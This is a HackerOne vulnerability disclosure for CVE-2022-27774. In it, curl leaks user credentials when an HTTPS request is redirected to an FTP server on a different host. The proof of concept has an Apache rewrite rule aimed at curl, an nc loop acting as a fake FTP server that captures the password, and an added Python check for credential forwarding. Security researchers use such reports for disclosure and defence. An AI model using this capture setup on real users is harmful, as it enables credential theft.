HackerOne report H1:1551586 (nyymi)
History: Apr 27, 2022 - 7:04 a.m.

Internet Bug Bounty: CVE-2022-27774: Credential leak on redirect

2022-04-27 07:04:13
nyymi
hackerone.com
$2400
75

5.7 Medium (CVSS3)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

3.5 Low (CVSS2)
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE
AV:N/AC:M/Au:S/C:P/I:N/A:N

EPSS: 0.001 (Low), Percentile: 33.1%

Summary:

curl/libcurl can be coaxed into leaking user credentials to a third-party host by issuing an HTTP redirect to an ftp:// URL.

Steps To Reproduce:

  1. Configure for example Apache2 on firstsite.tld to perform a redirect with mod_rewrite:
```
RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc ftp://secondsite.tld:9999 [R=301,L]
```
  2. Capture credentials at secondsite.tld, for example with:
```
while true; do echo -e "220 pocftp\n331 plz\n530 bye" | nc -v -l -p 9999; done
```
  3. Run curl with credentials against the redirecting site:
```
curl -L --user foo https://firstsite.tld/redirectpoc
```
  4. The entered password is visible in the fake FTP server:
```
Listening on 0.0.0.0 9999
Connection received on somehost someport
USER foo
PASS secretpassword
```

There are several issues here:

  1. The credentials are sent to a completely different host than the original one (firstsite.tld vs secondsite.tld). This is definitely not what the user would expect, considering the documentation says:
    > When authentication is used, curl only sends its credentials to the initial host. If a redirect takes curl to a different host, it will not be able to intercept the user+password. See also --location-trusted on how to change this.
  2. The redirect crosses from a secure context (HTTPS) to an insecure one (FTP). That is, the credentials are unexpectedly sent over an insecure channel even though the URL the user specified uses HTTPS.

In addition, TLS SRP user credentials (CURLOPT_TLSAUTH_USERNAME and CURLOPT_TLSAUTH_PASSWORD) are also leaked on redirects.
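As an added illustration (not curl's code), here is the credential-forwarding policy the report argues for, written as a small Python check: credentials given for the original URL may follow a redirect only when host, protocol and port all match, unless the user opted in with --location-trusted. Checking protocol and port in addition to host is the stricter rule the two findings above call for; the default-port table and the `next_hop` helper are assumptions of this example, and the URLs come from the report's own PoC.

```python
from urllib.parse import urlsplit

# Default ports per scheme, so "https://host" and "https://host:443" compare
# as the same origin. Assumed table; covers the schemes this report involves.
DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21, "ftps": 990}


def origin(url):
    """Return (scheme, host, port) for a URL, filling in the scheme's default port."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return scheme, host, port


def credentials_may_follow(original, target, location_trusted=False):
    """Decide whether credentials set for `original` may be sent to redirect `target`.

    Returns (allowed, reason). Host, protocol and port must all match; a
    change in any of them (firstsite.tld -> secondsite.tld, https -> ftp,
    443 -> 9999) drops the credentials unless the user trusted the redirect.
    """
    if location_trusted:
        return True, "--location-trusted: user explicitly allowed credentials to follow"
    o_scheme, o_host, o_port = origin(original)
    t_scheme, t_host, t_port = origin(target)
    if t_host != o_host:
        return False, f"host changed: {o_host} -> {t_host}"
    if t_scheme != o_scheme:
        return False, f"protocol changed: {o_scheme} -> {t_scheme}"
    if t_port != o_port:
        return False, f"port changed: {o_port} -> {t_port}"
    return True, "same host, protocol and port"


def next_hop(request, location, location_trusted=False):
    """Build the follow-up request for a redirect, stripping credentials unless allowed.

    `request` is a dict with "url", "user" and "password" (constructed shape).
    """
    allowed, reason = credentials_may_follow(request["url"], location, location_trusted)
    hop = {"url": location, "user": None, "password": None, "note": reason}
    if allowed:
        hop["user"], hop["password"] = request["user"], request["password"]
    return hop


if __name__ == "__main__":
    # The report's PoC: HTTPS on firstsite.tld redirecting to ftp://secondsite.tld:9999
    req = {"url": "https://firstsite.tld/redirectpoc", "user": "foo", "password": "secretpassword"}
    print(next_hop(req, "ftp://secondsite.tld:9999"))
```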

Impact

Leak of confidential information (user credentials).
